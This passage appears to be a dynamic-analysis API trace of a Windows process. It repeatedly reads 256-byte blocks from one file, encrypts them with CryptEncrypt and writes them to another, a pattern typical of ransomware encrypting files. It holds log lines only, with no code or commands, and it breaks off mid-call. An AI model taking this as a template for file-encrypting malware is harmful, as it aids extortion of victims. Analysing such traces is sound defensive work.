[0166.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.791] GetLastError () returned 0x0 [0166.791] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.791] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.791] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.792] GetLastError () returned 0x0 [0166.792] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.792] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.792] GetLastError () returned 0x0 [0166.792] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.792] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.792] GetLastError () returned 0x0 [0166.792] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.792] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.792] GetLastError () returned 0x0 [0166.792] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.792] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.792] GetLastError () returned 0x0 [0166.792] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.792] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.792] GetLastError () returned 0x0 [0166.792] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.792] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.793] GetLastError () returned 0x0 [0166.793] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.793] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.793] GetLastError () returned 0x0 [0166.793] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.793] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.793] GetLastError () returned 0x0 [0166.793] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.793] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.793] GetLastError () returned 0x0 [0166.793] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.793] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.793] GetLastError () returned 0x0 [0166.793] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.793] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.793] GetLastError () returned 0x0 [0166.793] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.793] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.793] GetLastError () returned 0x0 [0166.793] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.794] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.794] GetLastError () returned 0x0 [0166.794] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.794] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.794] GetLastError () returned 0x0 [0166.794] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.794] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.794] GetLastError () returned 0x0 [0166.794] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.794] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.794] GetLastError () returned 0x0 [0166.794] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.794] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.794] GetLastError () returned 0x0 [0166.794] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.794] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.794] GetLastError () returned 0x0 [0166.794] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.794] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.795] GetLastError () returned 0x0 [0166.795] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.795] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.795] GetLastError () returned 0x0 [0166.795] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.795] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.795] GetLastError () returned 0x0 [0166.795] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.795] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.795] GetLastError () returned 0x0 [0166.795] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.795] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.795] GetLastError () returned 0x0 [0166.795] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.795] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.795] GetLastError () returned 0x0 [0166.795] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.795] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.796] GetLastError () returned 0x0 [0166.796] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.796] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.796] GetLastError () returned 0x0 [0166.796] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.796] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.796] GetLastError () returned 0x0 [0166.796] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.796] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.796] GetLastError () returned 0x0 [0166.796] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.796] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.796] GetLastError () returned 0x0 [0166.796] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.796] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.796] GetLastError () returned 0x0 [0166.796] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.796] ReadFile (in: hFile=0x15b0, lpBuffer=0x2892040, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2892040*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, 